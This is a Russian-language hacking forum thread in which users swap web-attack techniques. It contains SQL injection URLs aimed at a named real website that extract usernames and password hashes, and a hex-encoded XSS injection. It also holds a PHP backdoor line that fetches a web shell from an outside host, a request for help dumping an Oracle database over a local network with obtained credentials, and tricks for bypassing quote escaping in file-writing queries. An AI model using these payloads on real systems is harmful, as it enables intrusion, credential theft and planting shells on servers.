а вот нифига я и не прав, твой сайт у меня не открываеться,приведу пример на другом, судя по всему слеш добавляеться после, уязвимый запрос наверно идет в стату судя по возврашаемой ошибке(убераем слеши): то есть например вот так можно вставить в стату пароль и хеш пользователя: PHP: http://www.greenmeanmachine.com/index.php?option=com_fireboard&func=view&catid=7&id=20315',link=(select/**/concat_ws(0x3A,username,password)/**/from/**/gmm_users/**/limit/**/1)/**/WHERE/**/userid/**/LIKE/**/'%%'/* или javascript PHP: http://www.greenmeanmachine.com/index.php?option=com_fireboard&func=view&catid=7&id=20315',link=0x27223e3c7363726970743e616c657274282727293c2f7363726970743e/**/WHERE/**/userid/**/LIKE/**/'%%'/* правдо я хз как оно там дальше выводиться в стате, может скрипты режуться.
еще один вопрос) конструкция select+1+top+login+from+user+where+id=1 не выводит ошибки) как я понимаю просто такого ид не существует? select+top+1+start+at+2+login+from+user ругается на где то был топик на эту тему но ответа так и не увидел. какие еще есть варианты вывести другие записи?)
mailbrush я сказал это чтобы малоли путь понадобиться при залитии файла (файл прив вроде включен) up. чуть подкоректировал чтобы было легче понимать
Насколько я понял тебя: if($_GET['get_shell']=='yes') copy('http://malicos.ru/shell.txt','/путь/имя_шелла'); /* file_put_contents( '/путь/имя_шелла',file_get_contents('http://malicos.ru/shell.txt')); и т.п. и т.п. */
Вопрос может не совсем в тему... Какой сниффер лучше юзать для просмотра пакетов отправляемых браузером на сайты?
вот именно как узнать каким методом передаётся ответ на голосование и какая переменная соответствует тому или иному варианту я не знаю
ну это можно посмотреть глянув в "html код" страницы... Ну или скачай Naviscope для перехвата пакетов + InetCrack and AccessDiver для посылки пакетов ....
Перекопал много ресурсов но так никто и не ответил. Как можно "слить" базу данных из локальной сети? Сервер базы крутится на Оракле. Имеется связка логин\пасс для программ работающих с базой. Как? Чем? Что еще нужно?
ММ, сомневаусь что это инклюд, так как файл с изображением не должен подключаться к php коду(не ну возможно и такое).Скорее всего там идет либо копирование этого файла на хост, либо он просто читаеться, а потом передаеться функции для работы с изображением.
Есть скуль, на любой запрос реагирует You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1 Пробывал и /**/ и разнообразные альтернативные варианты,окончание sql запроса так же пробывал разнообразные, всё равно такой же результат. Подзапросы так же не работают. Например id=211+or+substring(version(),1,1)=5-- плюётся ашыбкой You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'or substring(version(),1,1)=5--' at line 1 Не могу даже подобрать кол-во полей. В чём может быть проблема и как обойти?
Imperou$ Линк давай посмотрим, что-то мне кажется, что ты просто что-то не так делаешь, а скуль всё-же есть. Не хочешь в паблик, можешь мне в ПМ кинуть
Imperou$, а может проблемы в обозначении коментария -- ? попробуй Code: /* Code: # Code: +--+ Code: --+ Code: +-- и т д...
-m0rgan- всё уже решили, там лимит. Кстати, не пояснишь зачем вот такие комментарии? "+--" ,"+--+" Синтаксис мускула требует хотя-бы один пробел ПОСЛЕ -- . Всё остальное извраты
Доброго всем времени суток, у меня такой вопрос: Если какой то способ обхода слеширования кавычек или какой то способ не использовать кавычки при указания адресса записываемого файла при INTO DUMPFILE, INTO OUTFILE - %27 и указание в хексе(ну мало ли ) адресса не проходит, возможно ли это как то обойти?